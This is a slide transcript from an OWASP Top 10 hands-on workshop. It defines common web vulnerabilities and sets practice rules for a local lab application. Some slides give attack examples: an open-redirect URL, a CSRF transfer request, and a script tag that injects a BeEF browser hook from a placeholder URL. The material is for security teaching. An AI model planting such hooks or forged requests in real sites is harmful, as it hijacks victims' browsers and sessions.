«OWASP Top 10 hands on workshop» by Stanislav Breslavskyi
-
Upload
0xdec0de -
Category
Engineering
-
view
36 -
download
3
Transcript of «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi
OWASP Top-10 Hands-on Workshop
•Security Engineer @ SoftServe•NU “LP” student
whoami
•Web Application Security Assessment•Penetration Testing•Secure Software Development Lifecycle
What we do?
•Non-profit organization•Numerous chapters around the globe•Everyone can join•Open-Source
Open Web ApplicationSecurity Project
Meetings and conferences all around the globe
@AppSecEU ‘15 in Amsterdam
Knowledge base
OWASP Top-10
InjectionBroken Auth and
Session Management
XSSInsecure Direct
Object References
Security misconfiguration
Sensitive Data Exposure
Missing Function Level
ControlCSRF
Using Known Vulnerable
Components
Unvalidated Redirects and
Forwards
OWASP is GOOD!Hackers• Methodologies how to hack
Developers• Methodologies how to implement things securely and fix them
Testers• The same that hackers do• Methodologies how to test security stuff on their projects
Demo Time
•Either go by scenario with me or try to find 10 vulnerabilities by yourself.•No scanners (DDoS alert).•Do not attack infrastructure. Only web application vulnerabilities here.•Do not attack people around you.•No punching.
Rules
•172.16.216.28:5000/login?redirect_url=google.com•172.16.216.28:5000/change_password=1234•Credentials:
Let’s begin
Open Redirect
example.com/smth?redirect_url=http://google.com
CSRF
bank.com/trans?acc1=1234&acc2=4321&ammount=10000
Open Redirect + CSRF
Cross-Site Scripting
Supply JS code instead of valid data which will be processed by the browser
Broken Auth
Session management flaws
(HTTPOnly flag is missing in
our case)
XSS + Broken Authentication
Inject this script into the website<script src=“<url to the hook>” type=“text/javascript”/>
BeEF
SQL-injection
Supply SQL operators and statements instead of valid data which will be processed with the server as SQL queries (not strings)
Security misconfiguration
Crypto misuse, wrong DB
configuration, etc
Sensitive Data Exposure
Critical info leakage
SQLi + Security Misconfiguration + Sensitive Data Exposure
Insecure Direct Object
Reference
Access file you have no
permission to
Missing Function Level Control
Access to restricted
(sensitive) function.
Using Components with known Vulnerabilities
Vulnerable OS, libraries, frameworks, CMS,
Algorithms, etc.
Everything else …
• Try it by yourselfhttps://github.com/Varyagovich/hole-blog• Try to fix the project• Use OWASP projects (attack/prevention
cheat sheets and tools)• Contribute!
What to do next?
http://owasp-lviv.blogspot.com/
STAY SAFE!